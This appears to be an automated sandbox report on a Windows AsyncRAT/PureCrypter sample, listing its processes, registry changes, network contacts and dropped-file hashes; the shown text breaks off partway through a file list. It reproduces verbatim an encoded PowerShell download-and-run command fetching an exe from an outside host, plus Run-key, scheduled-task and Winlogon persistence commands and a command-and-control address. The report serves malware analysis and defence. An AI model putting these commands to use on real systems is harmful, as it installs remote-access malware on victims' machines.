Malware Analysis Report

2024-08-06 13:14

Sample ID 240615-m3hhks1hmk
Target 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68
SHA256 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68
Tags
asyncrat purecrypter downloader execution loader persistence rat
score
10/10


Analysis Overview

score
10/10

SHA256

0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

Threat Level: Known bad

The file 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68 was found to be: Known bad.

Malicious Activity Summary

asyncrat purecrypter downloader execution loader persistence rat

Detect PureCrypter injector

PureCrypter

AsyncRat

Modifies WinLogon for persistence

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Command and Scripting Interpreter: PowerShell

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-15 10:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 10:59

Reported

2024-06-15 11:01

Platform

win10v2004-20240508-en

Max time kernel

114s

Max time network

112s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"

Signatures

AsyncRat

rat asyncrat

Detect PureCrypter injector

loader
Description Indicator Process Target
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Ltntuhk\\Zmluvhyw.exe\"," C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A

PureCrypter

loader downloader purecrypter

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurtyService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurtyService\\SecurtyService.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\Taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 60 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 60 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 1528 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 60 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
PID 4296 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
PID 4296 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
PID 4976 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\cmd.exe
PID 1800 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe

"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /nobreak /t 20

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 20

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3768,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 40

C:\Windows\SysWOW64\timeout.exe

timeout 40

C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

"C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"

C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

"C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"

C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

"C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBiAGkAbgAyAC4AYQB3AHMALgBhAHQAcwBpAGcAbgAuAGMAbABvAHUAZAAvADkAMwBpADMAbwBuADEAZAAzAGYAdABhADgAaQBqAGgALwBkAGMAXwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAYgBxAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHkAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAG4AeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFMAZQBjAHUAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAaABjAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABuAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQA8ACMAaQBhAGsAIwA+AA=="

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
AZ 217.64.31.3:8808 tcp
AZ 217.64.31.3:8808 tcp
AZ 217.64.31.3:8437 tcp
US 8.8.8.8:53 filebin2.aws.atsign.cloud udp
AZ 217.64.31.3:8808 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

MD5 1a9c46f2b4420d156a82f160facf9376
SHA1 ce91faa7353cb4d3411b20a69350f27a6fe47990
SHA256 04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd
SHA512 14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

MD5 a0c1d68c150049944598f3927176a4b9
SHA1 bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1
SHA256 fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908
SHA512 c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

MD5 81230dd9258eebd0fe6a2cc681c43c51
SHA1 d6870e6014503e79589435d3b167f1c6e405721b
SHA256 9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1
SHA512 2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lyskobsu.vhx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d49246229b2077d7961ee5c90e0945f8
SHA1 8b50bbdbc82b00f545510bc3ea9e8cd96182fa79
SHA256 581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c
SHA512 5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 10:59

Reported

2024-06-15 11:01

Platform

win11-20240508-en

Max time kernel

143s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"

Signatures

AsyncRat

rat asyncrat

Detect PureCrypter injector

loader
Description Indicator Process Target
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Ltntuhk\\Zmluvhyw.exe\"," C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A

PureCrypter

loader downloader purecrypter

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurtyService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurtyService\\SecurtyService.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 2148 wrote to memory of 3620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2256 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 1048 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2256 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
PID 4092 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
PID 4092 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
PID 3764 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 3188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4840 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe

"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /nobreak /t 20

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 20

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 40

C:\Windows\SysWOW64\timeout.exe

timeout 40

C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

"C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"

C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

"C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"

C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

"C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBiAGkAbgAyAC4AYQB3AHMALgBhAHQAcwBpAGcAbgAuAGMAbABvAHUAZAAvADkAMwBpADMAbwBuADEAZAAzAGYAdABhADgAaQBqAGgALwBkAGMAXwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAYgBxAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHkAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAG4AeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFMAZQBjAHUAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAaABjAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABuAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQA8ACMAaQBhAGsAIwA+AA=="

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 discord.com udp
AZ 217.64.31.3:8437 tcp
AZ 217.64.31.3:8808 tcp
US 8.8.8.8:53 filebin2.aws.atsign.cloud udp

Files

C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

MD5 1a9c46f2b4420d156a82f160facf9376
SHA1 ce91faa7353cb4d3411b20a69350f27a6fe47990
SHA256 04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd
SHA512 14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

MD5 a0c1d68c150049944598f3927176a4b9
SHA1 bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1
SHA256 fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908
SHA512 c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

MD5 81230dd9258eebd0fe6a2cc681c43c51
SHA1 d6870e6014503e79589435d3b167f1c6e405721b
SHA256 9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1
SHA512 2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olzpxvl4.u2c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1e6e1eefe52266028bfa762c897b8e42
